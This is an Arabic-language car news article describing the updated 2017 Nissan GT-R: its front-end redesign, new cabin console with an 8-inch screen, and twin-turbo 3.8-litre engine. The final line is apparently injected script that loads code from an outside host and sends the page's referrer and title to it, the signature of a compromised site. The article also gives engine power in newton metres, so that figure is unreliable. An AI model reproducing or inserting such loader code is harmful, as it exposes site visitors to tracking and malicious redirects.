نيسان GT-R المجددة للعام 2017

كشفت شركة نيسان اليابانية من خلال معرض نيويورك الأخير عن طراز 2017 من سيارتها الرياضية الشهيرة GT-R التي خضعت لعملية تطوير تصميمية شملت هيكلها الخارحي ومقصورة ركابها، بالإضافة الى تطوير عدداً من تجهيزاتها ومكوناتها الميكانيكية، الأمر الذي عزز من أداءها الرياضي. وتشكل هذه التعديلات قفزة نوعية في مسيرة نيسان GT-R التي قدمت لأول مرة عام 2007.

وتبقى من أبرز التعديلات التي تم إدخالها على تصميم GT-R طراز العام 2017 هي في مقدمتها التي نالت فتحة تهوئة أمامية على شكل الحرف V المتحرك الذي بات من المعالم التصميمية الحصرية بسيارات نيسان الجديدة. وفي هذا السياق، تمت زيادة حجم هذه الفتحة التي نالت شبكاً ذات تصميم جديد يساهم في زيادة تبريد مقصورة المحرك. أما غطاء المحرك، فقد أعيد تصميمه بحيث ازدادت صلابته وليعمل تصميمه المتعدد المستويات على زيادة تماسك السيارة بسبب قدرته على زيادة قوى الدفع السفلية على السرعات العالية وذلك بمساعدة من الصادم الأمامي الجديد وعاكس الهواء المدمج به والخطوط الفريدة للقسم السفلي من المصابيح الأمامية والتي تعمل مجتمعة على تعزيز الطابع الرياضي لهذه السيارة إلى جانب تعديلات أخرى تم إدخالها على جسمها.

اما لناحية المقصورة، فقد تم ادخال تعديلات عديدة عليها يبقى أبرزها الكونسول الوسطي الجديد بالكامل والذي أصبح يحتوي على شاشة عرض للبيانات جديدة قياس 8 انش، مقود جديد وغيرها من التعديلات التي ساهمت برفع من قيمة هذه المقصورة واعطائها طابع أكثر فخامة.

ميكانيكياً حافظت GT-R على نفس محرك الـ 6 أسطوانات سعة 3.8 ليتر مع شاحني توربو لكن تم رفع قوته إلى 565 نيوتن متر مع عزم دوران ارتفع بدوره إلى 633 نيوتن متر.

وتنتقل قوة هذا المحرك إلى نظام دفع رباعي متطور جداً اشتهرت به GT-R منذ إطلاق الجيل الحالي منها، من خلال علبة تروس اوتوماتيكية مع قابض مزدوج مؤلفة من 6 نسب.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;